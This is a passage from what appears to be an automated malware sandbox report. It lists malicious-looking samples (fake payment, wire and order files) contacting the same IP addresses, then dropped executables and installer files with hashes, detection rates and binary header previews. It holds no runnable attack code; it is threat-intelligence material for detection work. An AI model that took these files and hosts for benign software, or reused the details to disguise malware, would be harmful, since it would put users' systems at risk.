                                                                                                                                            PAYMENT COPY.pptGet hashmaliciousBrowse
                                                                                                                                            • 74.114.154.22
                                                                                                                                            • 104.21.59.252
                                                                                                                                            • 104.21.65.45
                                                                                                                                            • 162.159.134.233
                                                                                                                                            20210621_064143.htmlGet hashmaliciousBrowse
                                                                                                                                            • 74.114.154.22
                                                                                                                                            • 104.21.59.252
                                                                                                                                            • 104.21.65.45
                                                                                                                                            • 162.159.134.233
                                                                                                                                            Wire Info.docxGet hashmaliciousBrowse
                                                                                                                                            • 74.114.154.22
                                                                                                                                            • 104.21.59.252
                                                                                                                                            • 104.21.65.45
                                                                                                                                            • 162.159.134.233
                                                                                                                                            Nueva orden de env#U00edo .exeGet hashmaliciousBrowse
                                                                                                                                            • 74.114.154.22
                                                                                                                                            • 104.21.59.252
                                                                                                                                            • 104.21.65.45
                                                                                                                                            • 162.159.134.233
                                                                                                                                            Global _Transport NZ..xlsxGet hashmaliciousBrowse
                                                                                                                                            • 74.114.154.22
                                                                                                                                            • 104.21.59.252
                                                                                                                                            • 104.21.65.45
                                                                                                                                            • 162.159.134.233
                                                                                                                                            ghXWqV6o1J.docxGet hashmaliciousBrowse
                                                                                                                                            • 74.114.154.22
                                                                                                                                            • 104.21.59.252
                                                                                                                                            • 104.21.65.45
                                                                                                                                            • 162.159.134.233
                                                                                                                                            idea-22543577.xlsmGet hashmaliciousBrowse
                                                                                                                                            • 74.114.154.22
                                                                                                                                            • 104.21.59.252
                                                                                                                                            • 104.21.65.45
                                                                                                                                            • 162.159.134.233
                                                                                                                                            OzygoxrbzzvtmyjupcpndcovpjxtqpiywjSigned.exeGet hashmaliciousBrowse
                                                                                                                                            • 74.114.154.22
                                                                                                                                            • 104.21.59.252
                                                                                                                                            • 104.21.65.45
                                                                                                                                            • 162.159.134.233
                                                                                                                                            2t71031BUz.exeGet hashmaliciousBrowse
                                                                                                                                            • 74.114.154.22
                                                                                                                                            • 104.21.59.252
                                                                                                                                            • 104.21.65.45
                                                                                                                                            • 162.159.134.233

                                                                                                                                            Dropped Files

                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                            C:\Program Files (x86)\Browzar\Uninstall.exeuphmioXDt5.exeGet hashmaliciousBrowse
                                                                                                                                              EdQZWKJ8hC.exeGet hashmaliciousBrowse
                                                                                                                                                cqfoBcirKS.exeGet hashmaliciousBrowse
                                                                                                                                                  ajyyWRGcFo.exeGet hashmaliciousBrowse
                                                                                                                                                    ccbf1853c703609eda36bc07ab8eb2faf692153b56ecf.exeGet hashmaliciousBrowse
                                                                                                                                                      42sB3Upj67.exeGet hashmaliciousBrowse
                                                                                                                                                        jTBM8kei4u.exeGet hashmaliciousBrowse
                                                                                                                                                          VvaBHdJoGY.exeGet hashmaliciousBrowse
                                                                                                                                                            16X4iz8fTb.exeGet hashmaliciousBrowse
                                                                                                                                                              e90fG4wc41.exeGet hashmaliciousBrowse
                                                                                                                                                                C:\Program Files (x86)\Browzar\NVdpapR9v21C.exeuphmioXDt5.exeGet hashmaliciousBrowse
                                                                                                                                                                  C:\Program Files (x86)\Browzar\Browzar.exeuphmioXDt5.exeGet hashmaliciousBrowse
                                                                                                                                                                    EdQZWKJ8hC.exeGet hashmaliciousBrowse
                                                                                                                                                                      cqfoBcirKS.exeGet hashmaliciousBrowse
                                                                                                                                                                        ajyyWRGcFo.exeGet hashmaliciousBrowse
                                                                                                                                                                          ccbf1853c703609eda36bc07ab8eb2faf692153b56ecf.exeGet hashmaliciousBrowse
                                                                                                                                                                            42sB3Upj67.exeGet hashmaliciousBrowse
                                                                                                                                                                              jTBM8kei4u.exeGet hashmaliciousBrowse
                                                                                                                                                                                VvaBHdJoGY.exeGet hashmaliciousBrowse
                                                                                                                                                                                  16X4iz8fTb.exeGet hashmaliciousBrowse
                                                                                                                                                                                    e90fG4wc41.exeGet hashmaliciousBrowse

                                                                                                                                                                                      Created / dropped Files

                                                                                                                                                                                      C:\Program Files (x86)\Browzar\Browzar.exe
                                                                                                                                                                                      Process:C:\Users\user\Documents\5hIw8OebGuR7XztS5WBp_Scm.exe
                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):228000
                                                                                                                                                                                      Entropy (8bit):7.766470537786167
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:6144:UKObz+evZ2rltMBCLU6TF5efiitf3EW/Sj2t44S/:Uhbz+evZe9cf3EWe2e1
                                                                                                                                                                                      MD5:847674F996283EB11F244A75F14F69AB
                                                                                                                                                                                      SHA1:49C335E9C453BC039B1EBF80D443218073CC0732
                                                                                                                                                                                      SHA-256:3947DD20B0B4DB6EF221606BD63BBA5CB9AE476C485123B2ED2490FB41D42AF6
                                                                                                                                                                                      SHA-512:842A558B1DF82F66CB1AF52507C73476E36D399A8BCCB1560E42F07109F4D41086CCED25061709B16E41AD86A77A0C5FF7E3558C71007FEA2884A9D0A129B079
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 2%
                                                                                                                                                                                      Joe Sandbox View:
                                                                                                                                                                                      • Filename: uphmioXDt5.exe, Detection: malicious, Browse
                                                                                                                                                                                      • Filename: EdQZWKJ8hC.exe, Detection: malicious, Browse
                                                                                                                                                                                      • Filename: cqfoBcirKS.exe, Detection: malicious, Browse
                                                                                                                                                                                      • Filename: ajyyWRGcFo.exe, Detection: malicious, Browse
                                                                                                                                                                                      • Filename: ccbf1853c703609eda36bc07ab8eb2faf692153b56ecf.exe, Detection: malicious, Browse
                                                                                                                                                                                      • Filename: 42sB3Upj67.exe, Detection: malicious, Browse
                                                                                                                                                                                      • Filename: jTBM8kei4u.exe, Detection: malicious, Browse
                                                                                                                                                                                      • Filename: VvaBHdJoGY.exe, Detection: malicious, Browse
                                                                                                                                                                                      • Filename: 16X4iz8fTb.exe, Detection: malicious, Browse
                                                                                                                                                                                      • Filename: e90fG4wc41.exe, Detection: malicious, Browse
                                                                                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........n.wr=.wr=.wr=Y.-=.wr=Tk|=.wr=.hy=.wr=.hx=.wr=.hv=.wr=?hy=.wr=?hv=.wr=.ws=.tr=T./=.wr=.Qy=.wr=.qt=.wr=(Wv=.wr=Rich.wr=........PE..L.....KI.....................p......0.............@..................................u......................................tn..........t^...........l..............................................................................................UPX0....................................UPX1................................@....rsrc....p.......d..................@..............................................................................................................................................................................................................................................................................................................................................................................3.03.UPX!....
                                                                                                                                                                                      C:\Program Files (x86)\Browzar\NVdpapR9v21C.exe
                                                                                                                                                                                      Process:C:\Users\user\Documents\5hIw8OebGuR7XztS5WBp_Scm.exe
                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):353648
                                                                                                                                                                                      Entropy (8bit):6.524059510767717
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3072:HxgVEBt0s9VmgI1dTpADWdKKL9Bvz1eM2mzQadFehDmTxlDhlHdj02ggg+lm7LR:HxCds9q7AqdKKb71PjzdAh+hluR
                                                                                                                                                                                      MD5:BB4FD26AB95CB6D7EB25F95AC1F3C2DA
                                                                                                                                                                                      SHA1:348D95E365BBAE89C2E1D6DA86B6F24890EE6CC4
                                                                                                                                                                                      SHA-256:468B4ADDACA9AEB12A501530750E08A987E2C4D4F9F9CCAAEC1F97BA67290F70
                                                                                                                                                                                      SHA-512:E1ECBF21B8C44A51F17CD4A540DC219796DDDB725703EB758BEF2AEC92E359146DB790A55AAA375FE6A83D6B0224D667546F95E4FF0C39154B711CD46D4F2B27
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Joe Sandbox View:
                                                                                                                                                                                      • Filename: uphmioXDt5.exe, Detection: malicious, Browse
                                                                                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`............................B.... ........@.. ..............................._....@.....................................J.......0............R..p............................................................ ............... ..H............text...H.... ...................... ..`.rsrc...0...........................@..@.reloc...............P..............@..B................(.......H........7...............................................................+.{....*.+.B+.+.}....*.+..+.....+.{....*.+.B+.+.}....*.+..+.....+.{....*.+.B+.+.}....*.+..+.....~....*..+......*.+..~....*..+......*.+..+.{....*.+.B+.+.}....*.+..+.....~....*..+......*.+..~....*..+......*.+..+.{....*.+.B+.+.}....*.+..+.....~....*..+......*.+...(u...*.+.{....*.+.B+.+.}....*.+..+.....+.{....*.+.B+.+.}....*.+..+.....~....*..+......*.+..+.{....*.+.B+.+.}....*.+..+.....+.{....*.+.B+.+.}....*.
                                                                                                                                                                                      C:\Program Files (x86)\Browzar\Uninstall.exe
                                                                                                                                                                                      Process:C:\Users\user\Documents\5hIw8OebGuR7XztS5WBp_Scm.exe
                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):112686
                                                                                                                                                                                      Entropy (8bit):6.422116717913919
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:1536:xO/z6hPABUjO/Zd1716EoLiL4l1HdIaqQPDm0xK8i6f0Zn9PRVW8sW45o40KvZu:+zgjO/Zd1RePDmZ8tf05iW4u40Kxu
                                                                                                                                                                                      MD5:F11BFFA11EA93A0DEC2696B418626028
                                                                                                                                                                                      SHA1:F31ED753C52312EA31F3F5B36B42BBA3D43B2649
                                                                                                                                                                                      SHA-256:3C307003566A032AFD865DE8713CA299B33C8405CC67DF296FC299BF1490E220
                                                                                                                                                                                      SHA-512:01B4A501D9CCF54C654DCCC617B9D2C11E6B5A2D47BAFA4ED7EE5296162EEB24A8B0C72A09DCB6A48BDF0789B05F66795979CDF0EC7DAFDC3B7B68D4CD19556C
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                                      Joe Sandbox View:
                                                                                                                                                                                      • Filename: uphmioXDt5.exe, Detection: malicious, Browse
                                                                                                                                                                                      • Filename: EdQZWKJ8hC.exe, Detection: malicious, Browse
                                                                                                                                                                                      • Filename: cqfoBcirKS.exe, Detection: malicious, Browse
                                                                                                                                                                                      • Filename: ajyyWRGcFo.exe, Detection: malicious, Browse
                                                                                                                                                                                      • Filename: ccbf1853c703609eda36bc07ab8eb2faf692153b56ecf.exe, Detection: malicious, Browse
                                                                                                                                                                                      • Filename: 42sB3Upj67.exe, Detection: malicious, Browse
                                                                                                                                                                                      • Filename: jTBM8kei4u.exe, Detection: malicious, Browse
                                                                                                                                                                                      • Filename: VvaBHdJoGY.exe, Detection: malicious, Browse
                                                                                                                                                                                      • Filename: 16X4iz8fTb.exe, Detection: malicious, Browse
                                                                                                                                                                                      • Filename: e90fG4wc41.exe, Detection: malicious, Browse
                                                                                                                                                                                      Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................4...........C.......P....@..........................0......ur...........@.............................. .......<A..........................................................................................................CODE.....4.......4.................. ..`DATA.........P.......8..............@...BSS..........p.......T...................idata.. ............T..............@....tls.................f...................rdata...............f..............@..P.reloc...............h..............@..P.rsrc...<A.......B...v..............@..P.....................|..............@..P........................................................................................................................................
                                                                                                                                                                                      C:\Program Files (x86)\Browzar\Uninstall.ini
                                                                                                                                                                                      Process:C:\Users\user\Documents\5hIw8OebGuR7XztS5WBp_Scm.exe
                                                                                                                                                                                      File Type:ISO-8859 text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2601
                                                                                                                                                                                      Entropy (8bit):5.341706963255943
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:RwhJw4UwV970y3970yH970s970r9701970yC970u970G9701970F970S970s597P:CLnDLkEeHRU+xfLxNM/xLVr+APg
                                                                                                                                                                                      MD5:26F1FAA649805BBB908EA33E1C2A89E4
                                                                                                                                                                                      SHA1:C5CFEBC6DBECEF54806996EDBCED1DF966E6E3C6
                                                                                                                                                                                      SHA-256:13BA9DFEEB62BBF29BE32AE9B9EE73D3FE2536AB89117E90ADC5ADAB11FFEABD
                                                                                                                                                                                      SHA-512:3B883F0ED097E5B0C7AE24A55DA69C7A5F7D421CF59DD356FADBA9969D954D7784425AB9716B4A12BCAB651BCCE8A6C960003B5334842D5573D1091FD02EE7F6
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: [f]..1=C:\Program Files (x86)\Browzar\Browzar.exe..2=C:\Program Files (x86)\Browzar\NVdpapR9v21C.exe..3=C:\Program Files (x86)\Browzar\Uninstall.exe..[e]..[u]..[r1]..0=2..1=SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Browzar 2.0.1..2=DisplayName..[r2]..0=2..1=SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Browzar 2.0.1..2=DisplayVersion..[r3]..0=2..1=SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Browzar 2.0.1..2=VersionMajor..[r4]..0=2..1=SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Browzar 2.0.1..2=VersionMinor..[r5]..0=2..1=SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Browzar 2.0.1..2=Publisher..[r6]..0=2..1=SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Browzar 2.0.1..2=DisplayIcon..[r7]..0=2..1=SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Browzar 2.0.1..2=UninstallString..[r8]..0=2..1=SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Browzar 2.0.1..2=URLInfoAbout..[r9]..0=2..1=SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Browzar
                                                                                                                                                                                      C:\Program Files (x86)\Company\NewProduct\Uninstall.exe
                                                                                                                                                                                      Process:C:\Users\user\Documents\M5uLwz0sXvZcR89u_43Nm9v8.exe
                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):99897
                                                                                                                                                                                      Entropy (8bit):6.501288733940089
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:1536:zO/z6hPABUjO/Zd1716EoLiL4l1HdIaqQPDm0xK8i6f0Zn9PRVW8sW45o75M:kzgjO/Zd1RePDmZ8tf05iW4u1M
                                                                                                                                                                                      MD5:56B3225C7B1D6F05B4BA4BA7B4CE2202
                                                                                                                                                                                      SHA1:27C0ED1A6D25A68A48950A7EDE29D87E1F2B1461
                                                                                                                                                                                      SHA-256:B3A3C03A2B140D4FBE9BAC4416866210D014DA4C64355B395715F2D4C2506C46
                                                                                                                                                                                      SHA-512:0A135B42EFBA7BA10D0723663F4BF86EF3C2978A4475C931FDCED1DD5DB5970E55F1995C214854EE43E1C8FED805368B4187B7B936BA8BE30AF260E3DF0EE8F4
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                                      Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................4...N.......C.......P....@..............................................@.............................. ...................................................................................................................CODE.....4.......4.................. ..`DATA.........P.......8..............@...BSS..........p.......T...................idata.. ............T..............@....tls.................f...................rdata...............f..............@..P.reloc...............h..............@..P.rsrc................v..............@..P.....................|..............@..P........................................................................................................................................
                                                                                                                                                                                      C:\Program Files (x86)\Company\NewProduct\Uninstall.ini
                                                                                                                                                                                      Process:C:\Users\user\Documents\M5uLwz0sXvZcR89u_43Nm9v8.exe
                                                                                                                                                                                      File Type:ISO-8859 text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2615
                                                                                                                                                                                      Entropy (8bit):5.367213984578544
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:RNaZAkj9z39zH9394989zC9r9x9399L9f9/9u9G9G17eHdGVydsJWM0qK1PYDh:7CxBNW6AxzN9RFloBxNVJJWqwPy
                                                                                                                                                                                      MD5:556D97A08E908CF0B3371D4BC025A6CB
                                                                                                                                                                                      SHA1:D840D4F69280ABA86C514F87E957FB38EFA6D423
                                                                                                                                                                                      SHA-256:0910F416E9CCC68263FF27B6C6ACBDDA8C343250C73FD8D5CAA7984CADEF09D1
                                                                                                                                                                                      SHA-512:821A5C5AAB8AEB3DCF303D71365897D03A8878C6D636794CC3979F8B70458D197AE3820D3626F4EB91E019838FC5E57A04B50ED4AE7806C04859B0A7AD60100A
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: [f]..1=C:\Program Files (x86)\Company\NewProduct\file4.exe..2=C:\Program Files (x86)\Company\NewProduct\jooyu.exe..3=C:\Program Files (x86)\Company\NewProduct\jingzhang.exe..4=C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe..5=C:\Program Files (x86)\Company\NewProduct\Uninstall.exe..[e]..[u]..[r1]..0=2..1=SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\NewProduct 1.00..2=DisplayName..[r2]..0=2..1=SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\NewProduct 1.00..2=DisplayVersion..[r3]..0=2..1=SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\NewProduct 1.00..2=VersionMajor..[r4]..0=2..1=SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\NewProduct 1.00..2=VersionMinor..[r5]..0=2..1=SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\NewProduct 1.00..2=Publisher..[r6]..0=2..1=SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\NewProduct 1.00..2=DisplayIcon..[r7]..0=2..1=SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\NewProduct 1.00..2=UninstallString..[r8]..0=2..1=
                                                                                                                                                                                      C:\Program Files (x86)\Company\NewProduct\d
                                                                                                                                                                                      Process:C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):31019008
                                                                                                                                                                                      Entropy (8bit):1.0834209899405411
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24576:fU+oSCdDVmygF5XZ6Rs7R4EPfMkr6fP3rsLO5:s+Vyg+lY
                                                                                                                                                                                      MD5:52125F3C8B5F9B1B25D0A4180F13E0AD
                                                                                                                                                                                      SHA1:BD2D643F4DD8B9E49C29E237E9A1C25BCE3DA0A4
                                                                                                                                                                                      SHA-256:2372AC2E6F5CC5E4C2EA2378AF0A59D30F4D6840501870A5CCEB6B49AD487BB9
                                                                                                                                                                                      SHA-512:FF809A4E3F3E7C28ABC4FE38D48C775810E9D4E0F79E7C845D3C518E5F7F35C54B0DFDDD5D534A827E191EF057678006D566DD93EB9C792FC6FDB25421310D58
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      C:\Program Files (x86)\Company\NewProduct\d.INTEG.RAW
                                                                                                                                                                                      Process:C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1604
                                                                                                                                                                                      Entropy (8bit):5.181964188515715
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:K24CXZESEsutbFzKjD9u9V98p3pcpB39p9au91Q3s:PbpESEsmhK2rA5g/3a21p
                                                                                                                                                                                      MD5:88A0F90EFC44657ED794345A09ADFECD
                                                                                                                                                                                      SHA1:24D43D988F0BA8C0B10D9E7EF8EB3E43BFA57F67
                                                                                                                                                                                      SHA-256:E6692871D929D7EF8ADCEFE6DF5D754040882FDCFAF41BF0D5477C4BE9B5F0E0
                                                                                                                                                                                      SHA-512:28BA9C2A97FE4CDD5B4D2D561E9A1C7BFBB6CCE4EFA53470CC864B7F652A6169E566A89EF2B2BBA045682E493ED3A696F06BAE970CCCBFD35839F2A036897868
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: ***** Repair of database 'd' started [ESENT version 06.02.9200.0000, (ESENT[6.2.9200.0] RETAIL RTM MBCS)]....search for 'ERROR:' to find errors..search for 'WARNING:' to find warnings..checking database header..ERROR: database was not shutdown cleanly (Dirty Shutdown)..database file "d" is 30932992 bytes..database file "d" is 30932992 bytes on disk...Creating 16 threads..checking SystemRoot..SystemRoot (OE)..ERROR: page 2: dbtime is larger than database dbtime (0x4f2a, 0x3f87)..SystemRoot (AE)..ERROR: page 3: dbtime is larger than database dbtime (0x4f2c, 0x3f87)..checking system tables..MSysObjects ..MSysObjectsShadow ..MSysObjects:.7004:.ERROR: page 13: dbtime is larger than database dbtime (0x3fc6, 0x3f87)..MSysObjects:.7004:.ERROR: page 14: dbtime is larger than database dbtime (0x46bb, 0x3f87)..MSysObjects:.7004:.ERROR: page 20: dbtime is larger than database dbtime (0x4f7f, 0x3f87)..MSysObjects Name..MSysObjects RootObjects..MSysObjectsShadow:.7004:.ERROR: page 27: dbtime is larg
                                                                                                                                                                                      C:\Program Files (x86)\Company\NewProduct\d.jfm
                                                                                                                                                                                      Process:C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):8192
                                                                                                                                                                                      Entropy (8bit):0.07543732783435073
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:c39yt2t1xqa6lDfyt8ll:cgti1ct5at0
                                                                                                                                                                                      MD5:62346E08D48D339F939119D9615CB929
                                                                                                                                                                                      SHA1:FF0F231EFE6A170008F8B0F40AF8A25BDA1F80D1
                                                                                                                                                                                      SHA-256:7C06A9E414F4C8C4FE6FFF23E02286AB2D59650E8A063895F55BAFEB78E986E4
                                                                                                                                                                                      SHA-512:D37126B6509C01068A09A89C861CE92B62DF4AE54EDE2B0FD78452E8693B68557D20FB4BA6284019930C390F8C7BB3779D4C2D65F053079BD85F43AB8AD5364A
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: .2?..........................................y.......y..................................\.. .....y.................D#.......y..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      C:\Program Files (x86)\Company\NewProduct\file4.exe
                                                                                                                                                                                      Process:C:\Users\user\Documents\M5uLwz0sXvZcR89u_43Nm9v8.exe
                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):163840
                                                                                                                                                                                      Entropy (8bit):7.020025749730853
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3072:CaY0LwJiwqkCPyIrxC55W4NfrZL5P1yxRrh485qC96QnoSe:C7Ylvx83L5aRl4Isp3
                                                                                                                                                                                      MD5:02580709C0E95ABA9FDD1FBDF7C348E9
                                                                                                                                                                                      SHA1:C39C2F4039262345121ECEE1EA62CC4A124A0347
                                                                                                                                                                                      SHA-256:70D1BFB908EAB66681A858D85BB910B822CC76377010ABD6A77FD5A78904EA15
                                                                                                                                                                                      SHA-512:1DE4F5C98A1330A75F3CCC8A07E095640AAC893A41A41BFA7D0CD7EBC11D22B706DBD91E0EB9A8FE027B6365C0D4CAD57AB8F1B130A77AC1B1A4DA2C21A34CB5
                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                      • Antivirus: Metadefender, Detection: 19%, Browse
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 79%
                                                                                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........a.Q...Q...Q...v.r.A...v.a.y...v.b.:...v.t.D...Q.......v.~.S...v.s.P...v.w.P...RichQ...........................PE..L...7..G.............................;............@.........................................................................d........`..,............p..($..............................................@...............d............................text............................... ..`.rdata...Z.......`..................@..@.data....,...0... ...0..............@....rsrc...,....`... ...P..............@..@.text0...............p..........................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      C:\Program Files (x86)\Company\NewProduct\jingzhang.exe
                                                                                                                                                                                      Process:C:\Users\user\Documents\M5uLwz0sXvZcR89u_43Nm9v8.exe
                                                                                                                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1123869
                                                                                                                                                                                      Entropy (8bit):7.153743574847911
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24576:TGgoe5Q0nyofLPeHy2sjv7myfXrNXbjFveqqb:KwQ0nyoz3tvHLleBb
                                                                                                                                                                                      MD5:A4C547CFAC944AD816EDF7C54BB58C5C
                                                                                                                                                                                      SHA1:B1D3662D12A400ADA141E24BC014C256F5083EB0
                                                                                                                                                                                      SHA-256:2F158FE98389B164103A1C3AAC49E10520DFD332559D64A546B65AF7EF00CD5F
                                                                                                                                                                                      SHA-512:AD5891FAEE33A7F91C5F699017C2C14448CA6FDA23AC10DC449354CE2C3E533383DF28678E0D170856400F364A99F9996AD35555BE891D2D9EF97D83FDD91BBB
                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: Metadefender, Detection: 29%, Browse
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 79%
                                                                                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................r.................r.................Rich...........................PE..L......Z.................@...@...............P....@.........................................................................|T..P....................................................................................P...............................text...h=.......@.................. ..`.rdata.......P.......P..............@..@.data...<....`...0...`..............@...................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                                                                                                                                      Process:C:\Users\user\Documents\M5uLwz0sXvZcR89u_43Nm9v8.exe
                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):994816
                                                                                                                                                                                      Entropy (8bit):7.367152366876468
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24576:6dWdWjFMYKO1ZcqlHrorVCkTNkdBAnlXG6+Z1mbXEC:FSMYKO1ZcmHsrVCokUlXF+Z1IUC
                                                                                                                                                                                      MD5:AED57D50123897B0012C35EF5DEC4184
                                                                                                                                                                                      SHA1:568571B12CA44A585DF589DC810BF53ADF5E8050
                                                                                                                                                                                      SHA-256:096021EB5950EE16B7EC51756ABE05F90C3530206E16286E7610B8A5A544A85E
                                                                                                                                                                                      SHA-512:EA0EE3A0762BAA3539E8026A8C624AD897EFE005FAADCF1FF67EBFC555F29B912B24AD4342D5E0C209F36F5288867246BD1BDFED7DF739E608A72FA7B4FA2D7C
                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                      • Antivirus: Metadefender, Detection: 44%, Browse
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 90%
                                                                                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........U..o...o...o..l...o..j...o..k...o.O.k...o.O.l...o.O.j...o..n...o...n...o...f...o.......o.......o...m...o.Rich..o.................PE..L...-..`................. ..........k........0....@..........................`............@.................................\...P................................L...3..p...................04......x3..@............0...............................text...B........ .................. ..`.rdata...}...0...~...$..............@..@.data....5.......&..................@....rsrc...............................@..@.reloc...L.......N..................@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                                                                                                                      Process:C:\Users\user\Documents\M5uLwz0sXvZcR89u_43Nm9v8.exe
                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):732160
                                                                                                                                                                                      Entropy (8bit):7.942489477959937
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:12288:Q2VU2WB3OzCPZuv6YBsKYwLqVApHgdrGIV/LqBW9G9DCSK1n+jF9nMrcf94IilAS:rG2qezCPZa6HfwiAoiTBWsRCSWnS5f9U
                                                                                                                                                                                      MD5:7A151DB96E506BD887E3FFA5AB81B1A5
                                                                                                                                                                                      SHA1:1133065FCE3B06BD483B05CCA09E519B53F71447
                                                                                                                                                                                      SHA-256:288376E11301C8CA3EB52871D09133F0199B911A33B9658579929EF6BAC8EA6C
                                                                                                                                                                                      SHA-512:33B21B9A3F84A847475C99C642447138344FC53379C40044B50768E5EBE2FA5B5064126678151D86FB4AA47E4B4A8FEFD2B20EE126ABF11D1C9E56D46A2FBE78
                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                      Antivirus:
